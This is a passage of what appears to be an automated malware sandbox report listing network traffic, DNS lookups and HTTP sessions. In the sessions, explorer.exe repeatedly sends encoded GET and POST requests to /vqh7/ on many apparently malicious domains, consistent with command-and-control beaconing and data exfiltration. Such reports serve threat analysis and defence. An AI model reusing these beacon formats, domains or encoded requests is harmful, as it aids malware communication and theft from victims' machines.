                                                                      Feb 23, 2023 11:18:23.294740915 CET8049701148.251.13.126192.168.2.4
                                                                      Feb 23, 2023 11:18:28.307542086 CET4970280192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:28.326543093 CET804970281.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:28.326778889 CET4970280192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:28.327013016 CET4970280192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:28.346019030 CET804970281.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:28.347426891 CET804970281.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:28.347467899 CET804970281.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:28.347594976 CET4970280192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:29.827730894 CET4970280192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.844063997 CET4970380192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.863101959 CET804970381.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:30.864619970 CET4970380192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.864835024 CET4970380192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.883564949 CET804970381.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:30.884332895 CET804970381.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:30.884350061 CET804970381.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:30.884561062 CET4970380192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.889564991 CET4970380192.168.2.481.169.145.72
                                                                      Feb 23, 2023 11:18:30.908268929 CET804970381.169.145.72192.168.2.4
                                                                      Feb 23, 2023 11:18:35.932595968 CET4970480192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:35.953844070 CET804970481.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:35.954006910 CET4970480192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:35.954101086 CET4970480192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:35.975187063 CET804970481.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:35.975908995 CET804970481.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:35.975956917 CET804970481.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:35.976027012 CET4970480192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:37.469295025 CET4970480192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.489204884 CET4970580192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.511640072 CET804970581.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:38.511735916 CET4970580192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.511842966 CET4970580192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.533932924 CET804970581.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:38.534801960 CET804970581.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:38.534854889 CET804970581.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:38.534965992 CET4970580192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.535137892 CET4970580192.168.2.481.169.145.158
                                                                      Feb 23, 2023 11:18:38.556358099 CET804970581.169.145.158192.168.2.4
                                                                      Feb 23, 2023 11:18:43.803563118 CET4970680192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:43.963169098 CET804970675.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:43.963480949 CET4970680192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:43.963650942 CET4970680192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:44.123063087 CET804970675.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:44.123210907 CET804970675.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:44.123233080 CET804970675.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:44.123246908 CET804970675.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:44.123430014 CET4970680192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:45.661566019 CET4970680192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:46.673404932 CET4970780192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:46.790610075 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:46.790941000 CET4970780192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:46.791088104 CET4970780192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:46.908153057 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:46.910317898 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:46.910343885 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:46.910362005 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:46.910924911 CET4970780192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:46.910924911 CET4970780192.168.2.475.102.22.168
                                                                      Feb 23, 2023 11:18:47.028130054 CET804970775.102.22.168192.168.2.4
                                                                      Feb 23, 2023 11:18:58.124574900 CET4970880192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:18:58.143255949 CET804970891.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:18:58.143384933 CET4970880192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:18:58.143523932 CET4970880192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:18:58.162846088 CET804970891.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:18:58.162880898 CET804970891.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:18:58.162961960 CET4970880192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:18:59.658396959 CET4970880192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.675079107 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.693614006 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.693733931 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.693964958 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.746474028 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746519089 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746546984 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746576071 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746593952 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.746604919 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746634007 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746634960 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.746659040 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746686935 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746699095 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.746738911 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746767998 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.746798992 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.746836901 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.765264034 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765304089 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765330076 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765369892 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765394926 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765397072 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.765424013 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765430927 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.765454054 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765481949 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:00.765484095 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.767136097 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.767405033 CET4970980192.168.2.491.195.240.117
                                                                      Feb 23, 2023 11:19:00.785670996 CET804970991.195.240.117192.168.2.4
                                                                      Feb 23, 2023 11:19:06.727296114 CET4971080192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:06.747411966 CET804971081.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:06.747534990 CET4971080192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:06.747879028 CET4971080192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:06.767739058 CET804971081.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:06.772597075 CET804971081.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:06.772641897 CET804971081.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:06.772732019 CET4971080192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:08.279268026 CET4971080192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.298649073 CET4971180192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.318766117 CET804971181.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:09.318871021 CET4971180192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.346446037 CET4971180192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.366677046 CET804971181.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:09.371157885 CET804971181.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:09.371370077 CET804971181.17.29.148192.168.2.4
                                                                      Feb 23, 2023 11:19:09.371850014 CET4971180192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.381829023 CET4971180192.168.2.481.17.29.148
                                                                      Feb 23, 2023 11:19:09.401834011 CET804971181.17.29.148192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 23, 2023 11:17:44.841125011 CET5657253192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:17:44.865573883 CET53565728.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:17:55.001729965 CET5091153192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:17:55.034153938 CET53509118.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:02.706624031 CET5968353192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:02.753803015 CET53596838.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:11.734714031 CET6416753192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:12.748306990 CET6416753192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:13.004261971 CET53641678.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:14.032063961 CET53641678.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:14.032814980 CET5856553192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:15.061243057 CET5856553192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:15.319557905 CET53585658.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:16.083816051 CET53585658.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:20.342292070 CET5223953192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:20.667448997 CET53522398.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:28.284471989 CET5680753192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:28.306530952 CET53568078.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:35.906919003 CET6100753192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:35.931248903 CET53610078.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:43.574078083 CET6068653192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:43.774750948 CET53606868.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:51.942712069 CET6112453192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:51.959988117 CET53611248.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:52.976035118 CET5944453192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:52.993083954 CET53594448.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:18:58.004534006 CET5557053192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:18:58.123270035 CET53555708.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:19:06.561878920 CET6490653192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:19:06.596494913 CET53649068.8.8.8192.168.2.4
                                                                      Feb 23, 2023 11:19:15.640957117 CET5944653192.168.2.48.8.8.8
                                                                      Feb 23, 2023 11:19:15.662377119 CET53594468.8.8.8192.168.2.4

                                                                      ICMP Packets

                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Feb 23, 2023 11:18:14.032234907 CET192.168.2.48.8.8.8cff8(Port unreachable)Destination Unreachable
                                                                      Feb 23, 2023 11:18:16.083887100 CET192.168.2.48.8.8.8cff8(Port unreachable)Destination Unreachable

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Feb 23, 2023 11:17:44.841125011 CET192.168.2.48.8.8.80xc4c4Standard query (0)www.verde-amar.infoA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:17:55.001729965 CET192.168.2.48.8.8.80x7a0bStandard query (0)www.jewelryimpact.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:02.706624031 CET192.168.2.48.8.8.80xe1a6Standard query (0)www.specigain.onlineA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:11.734714031 CET192.168.2.48.8.8.80x361bStandard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:12.748306990 CET192.168.2.48.8.8.80x361bStandard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:14.032814980 CET192.168.2.48.8.8.80xa639Standard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:15.061243057 CET192.168.2.48.8.8.80xa639Standard query (0)www.treebarktees.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:20.342292070 CET192.168.2.48.8.8.80xed3fStandard query (0)www.gachthe365.siteA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:28.284471989 CET192.168.2.48.8.8.80x878bStandard query (0)www.frogair.onlineA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:35.906919003 CET192.168.2.48.8.8.80xffc2Standard query (0)www.krankenzusatz.netA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:43.574078083 CET192.168.2.48.8.8.80xdb7cStandard query (0)www.hotelyeah.topA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:51.942712069 CET192.168.2.48.8.8.80x835eStandard query (0)www.tobinrasheedja.cyouA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:52.976035118 CET192.168.2.48.8.8.80x62f6Standard query (0)www.tobinrasheedja.cyouA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:58.004534006 CET192.168.2.48.8.8.80x49c9Standard query (0)www.nativealternatives.comA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:19:06.561878920 CET192.168.2.48.8.8.80x2bbcStandard query (0)www.heroclassicrally.co.ukA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:19:15.640957117 CET192.168.2.48.8.8.80x8348Standard query (0)www.awc.icuA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Feb 23, 2023 11:17:44.865573883 CET8.8.8.8192.168.2.40xc4c4No error (0)www.verde-amar.info185.53.177.54A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:17:55.034153938 CET8.8.8.8192.168.2.40x7a0bNo error (0)www.jewelryimpact.com81.17.29.149A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:02.753803015 CET8.8.8.8192.168.2.40xe1a6No error (0)www.specigain.online199.192.22.198A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:13.004261971 CET8.8.8.8192.168.2.40x361bServer failure (2)www.treebarktees.comnonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:14.032063961 CET8.8.8.8192.168.2.40x361bServer failure (2)www.treebarktees.comnonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:15.319557905 CET8.8.8.8192.168.2.40xa639Server failure (2)www.treebarktees.comnonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:16.083816051 CET8.8.8.8192.168.2.40xa639Server failure (2)www.treebarktees.comnonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:20.667448997 CET8.8.8.8192.168.2.40xed3fNo error (0)www.gachthe365.sitegachthe365.siteCNAME (Canonical name)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:20.667448997 CET8.8.8.8192.168.2.40xed3fNo error (0)gachthe365.site148.251.13.126A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:28.306530952 CET8.8.8.8192.168.2.40x878bNo error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:28.306530952 CET8.8.8.8192.168.2.40x878bNo error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:35.931248903 CET8.8.8.8192.168.2.40xffc2No error (0)www.krankenzusatz.netkrankenzusatz.netCNAME (Canonical name)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:35.931248903 CET8.8.8.8192.168.2.40xffc2No error (0)krankenzusatz.net81.169.145.158A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:43.774750948 CET8.8.8.8192.168.2.40xdb7cNo error (0)www.hotelyeah.tophotelyeah.topCNAME (Canonical name)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:43.774750948 CET8.8.8.8192.168.2.40xdb7cNo error (0)hotelyeah.top75.102.22.168A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:51.959988117 CET8.8.8.8192.168.2.40x835eName error (3)www.tobinrasheedja.cyounonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:52.993083954 CET8.8.8.8192.168.2.40x62f6Name error (3)www.tobinrasheedja.cyounonenoneA (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:18:58.123270035 CET8.8.8.8192.168.2.40x49c9No error (0)www.nativealternatives.com91.195.240.117A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:19:06.596494913 CET8.8.8.8192.168.2.40x2bbcNo error (0)www.heroclassicrally.co.uk81.17.29.148A (IP address)IN (0x0001)false
                                                                      Feb 23, 2023 11:19:15.662377119 CET8.8.8.8192.168.2.40x8348No error (0)www.awc.icu8.210.88.42A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.verde-amar.info
                                                                      • www.jewelryimpact.com
                                                                      • www.specigain.online
                                                                      • www.gachthe365.site
                                                                      • www.frogair.online
                                                                      • www.krankenzusatz.net
                                                                      • www.hotelyeah.top
                                                                      • www.nativealternatives.com
                                                                      • www.heroclassicrally.co.uk

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449695185.53.177.5480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:17:44.947619915 CET91OUTGET /vqh7/?hTb82V=c3T4NncdiggRvhiDkOPUV54pY2f+jJK99/S+uCks/lUPYoCt0sy68wjf82DqpFtmKPoTAmkWX3bWObR3jmvMIkerc/mY+VSrAA==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.verde-amar.info
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:17:44.967410088 CET92INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Thu, 23 Feb 2023 10:17:44 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.44969681.17.29.14980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:17:55.055804968 CET93OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.jewelryimpact.com
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.jewelryimpact.com
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.jewelryimpact.com/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 7e 34 7e 6c 77 41 61 58 79 38 76 75 72 73 7a 39 59 76 45 63 59 79 39 79 28 4b 39 6b 41 4a 42 65 50 48 58 70 4b 59 53 4d 43 49 63 69 75 67 63 55 47 78 47 4f 4b 50 67 63 55 4f 6f 63 43 4a 69 6d 79 74 71 62 33 31 42 69 4a 6d 52 6c 64 79 63 6d 63 39 6f 58 66 57 6a 4a 38 79 38 59 71 50 51 4b 7e 73 6f 5a 64 48 55 4c 73 52 67 6f 6b 72 70 53 50 4d 4b 69 28 4b 69 54 53 66 76 4a 53 49 77 45 6f 79 79 70 74 75 53 7a 49 30 35 45 46 42 48 6e 45 5a 4a 42 55 6d 4f 73 77 67 6a 47 36 6d 6b 54 33 36 5a 78 4b 72 4a 64 63 6b 47 6a 6c 37 51 66 43 67 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=~4~lwAaXy8vursz9YvEcYy9y(K9kAJBePHXpKYSMCIciugcUGxGOKPgcUOocCJimytqb31BiJmRldycmc9oXfWjJ8y8YqPQK~soZdHULsRgokrpSPMKi(KiTSfvJSIwEoyyptuSzI05EFBHnEZJBUmOswgjG6mkT36ZxKrJdckGjl7QfCg).
                                                                      Feb 23, 2023 11:17:55.082740068 CET93INHTTP/1.1 302 Found
                                                                      cache-control: max-age=0, private, must-revalidate
                                                                      connection: close
                                                                      content-length: 11
                                                                      date: Thu, 23 Feb 2023 10:17:54 GMT
                                                                      location: http://survey-smiles.com
                                                                      server: nginx
                                                                      set-cookie: sid=565ff4ae-b363-11ed-a2c9-916c17a0bcc0; path=/; domain=.jewelryimpact.com; expires=Tue, 13 Mar 2091 13:32:02 GMT; max-age=2147483647; HttpOnly
                                                                      Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                      Data Ascii: Redirecting


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.44970581.169.145.15880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:38.511842966 CET123OUTGET /vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.krankenzusatz.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:18:38.534801960 CET124INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 23 Feb 2023 10:18:38 GMT
                                                                      Server: Apache/2.4.55 (Unix)
                                                                      Location: https://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4
                                                                      Content-Length: 367
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 61 6e 6b 65 6e 7a 75 73 61 74 7a 2e 6e 65 74 2f 76 71 68 37 2f 3f 68 54 62 38 32 56 3d 79 33 31 42 72 61 6a 45 45 72 70 31 78 39 42 64 37 47 34 44 79 33 6e 79 70 62 49 55 39 70 74 69 50 34 4a 37 42 56 6b 79 58 4e 77 6e 58 35 39 32 65 5a 5a 76 74 6c 2f 4f 66 36 65 77 34 45 67 62 44 34 53 69 36 33 73 61 54 31 36 72 37 4c 4e 62 37 71 66 30 2b 57 2b 6c 57 67 43 72 45 39 47 30 6a 77 3d 3d 26 61 6d 70 3b 72 79 51 44 63 3d 76 77 79 62 34 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&amp;ryQDc=vwyb4">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      11192.168.2.44970675.102.22.16880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:43.963650942 CET125OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.hotelyeah.top
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.hotelyeah.top
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.hotelyeah.top/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 32 42 55 66 6d 31 58 61 34 2d 59 50 49 71 34 55 6b 6f 76 35 39 6e 37 6d 66 70 46 44 76 36 73 68 48 51 6c 6a 74 50 48 68 45 30 56 39 32 73 67 36 38 70 4b 41 55 54 53 68 68 71 63 4a 72 49 39 35 7a 7a 6e 71 70 48 6a 41 74 4d 39 7a 39 72 4c 35 31 57 68 43 61 43 44 55 4f 4b 66 75 4f 4c 79 4d 58 66 47 78 6b 4c 6f 6d 44 69 28 44 55 4f 45 5a 53 76 68 6d 74 30 7e 76 6c 4f 65 67 28 78 35 77 74 31 4a 61 54 78 7e 4f 59 62 45 50 4f 62 7a 6d 78 66 42 64 64 5a 72 37 59 68 41 52 4f 4a 7a 69 32 72 64 30 4f 5a 35 36 44 43 73 37 72 59 75 54 52 51 29 2e 00 00 00 00 00 00 00 00
